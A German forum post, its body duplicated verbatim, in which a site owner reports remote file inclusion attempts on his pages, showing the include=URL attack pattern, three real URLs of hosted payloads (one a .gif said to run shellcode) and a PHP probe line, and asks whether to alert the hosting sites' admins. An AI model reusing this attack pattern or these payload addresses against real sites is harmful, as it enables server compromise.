Vorweg: Ich hab für diesen Thread kein wirklich passendes Forum gefunden. Wenn die Mods meinen, dass er z.b. in der Computerecke oder beim Webhosting besser aufgehoben wäre als im Programmierforum, bitte verschieben.
Nun zu meiner eigentlichen Frage: Ich stelle in letzter Zeit verstärkt versuchte Angriffe auf meine Seiten fest, nach dem Schema https://www.talionsseite.de/unsicheresscript.php?include=https://böseseite.de/pfad/zum/script.xyz
Nun sind allerdings die meisten "bösen Seiten" gar nicht böse, sondern einfach nur Seiten die - freiwillig oder unbeabsichtigt - Nutzern ermöglichen, Dateien hochzuladen. (Auch Myimg.de könnte man dafür nutzen, denn solange der Bildheader intakt ist, kann der Rest des Bildes beliebigen Code enthalten.)
Also was tun? Nichts tun und freuen, dass die eigenen Script sicher sind, oder die Admins der Host-Seiten benachrichtigen? Ein rechtliches Risiko besteht für die Seiten (die ja nicht selbst Angriffe ausführen, sondern nur (unwissentlich) den Code bereitstellen) ohnehin nicht, oder?
Beispiele die auf meinen Seiten verwendet wurden:
https://www.lieblingshomepage.de/feedbackservice/smile-i.gif
https://www.agv-schaafheim.de/gallery/data/media/nexa/zevela/
https://www.tcmforum.com/web/sal/yuveli/
(Ersteres versucht Shellcode auszuführen, die letzteren beiden sind bereits gelöscht und enthielten nur <?php echo md5("just_a_test");?> wie im Google-Cache noch zu sehen ist.)
Nun zu meiner eigentlichen Frage: Ich stelle in letzter Zeit verstärkt versuchte Angriffe auf meine Seiten fest, nach dem Schema https://www.talionsseite.de/unsicheresscript.php?include=https://böseseite.de/pfad/zum/script.xyz
Nun sind allerdings die meisten "bösen Seiten" gar nicht böse, sondern einfach nur Seiten die - freiwillig oder unbeabsichtigt - Nutzern ermöglichen, Dateien hochzuladen. (Auch Myimg.de könnte man dafür nutzen, denn solange der Bildheader intakt ist, kann der Rest des Bildes beliebigen Code enthalten.)
Also was tun? Nichts tun und freuen, dass die eigenen Script sicher sind, oder die Admins der Host-Seiten benachrichtigen? Ein rechtliches Risiko besteht für die Seiten (die ja nicht selbst Angriffe ausführen, sondern nur (unwissentlich) den Code bereitstellen) ohnehin nicht, oder?
Beispiele die auf meinen Seiten verwendet wurden:
https://www.lieblingshomepage.de/feedbackservice/smile-i.gif
https://www.agv-schaafheim.de/gallery/data/media/nexa/zevela/
https://www.tcmforum.com/web/sal/yuveli/
(Ersteres versucht Shellcode auszuführen, die letzteren beiden sind bereits gelöscht und enthielten nur <?php echo md5("just_a_test");?> wie im Google-Cache noch zu sehen ist.)
